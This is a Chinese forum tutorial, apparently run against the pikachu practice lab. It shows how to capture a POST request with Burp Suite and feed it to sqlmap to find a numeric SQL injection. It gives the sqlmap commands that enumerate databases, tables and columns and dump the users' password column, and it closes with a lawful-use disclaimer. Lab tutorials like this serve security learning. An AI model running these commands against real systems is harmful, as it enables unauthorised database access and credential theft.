请选择 进入手机版 | 继续访问电脑版
查看: 413|回复: 0

sqlmap结合burpsuite数字型注入(post)

[复制链接]

签到天数: 25 天

[LV.4]偶尔看看III

134

主题

140

帖子

3115

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3115

活跃会员宣传达人灌水之王热心会员推广达人突出贡献优秀版主荣誉管理论坛元老

发表于 2020-5-12 21:45:07 | 显示全部楼层 |阅读模式
SQL注入漏洞
主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
数字型注入(post)

1.png

2.png
3.png
利用sqlmap跑
  • 首先,开burp截包。
  • 输入1,提交。可以看见,burp已经把id获取到了
  • 复制到文件,保存为txt文件。
1.png

打开sqlmap
  1. sqlmap -r 1.txt
复制代码
2.png
获取所有数据库
  1. sqlmap -r 1.txt --dbs
复制代码
3.png
获取pikachu下所有的表
  1. sqlmap -r 1.txt -D pikachu --tables
复制代码
4.png
获取users下所有的列
  1. sqlmap -r 1.txt -D pikachu -T users --columns
复制代码
5.png
获取列password下的内容
  1. sqlmap -r 1.txt -D pikachu -T users -C "password" --dump
复制代码
6.png


在局域网环境进行,切勿用于非法用途
声明:
切勿使用在本网站学习的方法攻击其他计算机,保护网络安全,人人有责,做一个维护网络安全的人。
该网站编写此类文章的目标是为了让渗透测试爱好者在学习过程中更好的掌握技巧和方法同时也让广大网民了解黑客是如何对互联网进行攻击的从而更好的保护网络财产安全,如果使用在本站学习的方法和技巧攻击其他计算机的造成的后果自负,与本站无关,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋| TTFY论坛-IT信息技术计算机行业交流发表平台 ( 黔ICP备19006062号 )

GMT+8, 2020-9-22 09:37 , Processed in 0.028208 second(s), 30 queries .

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表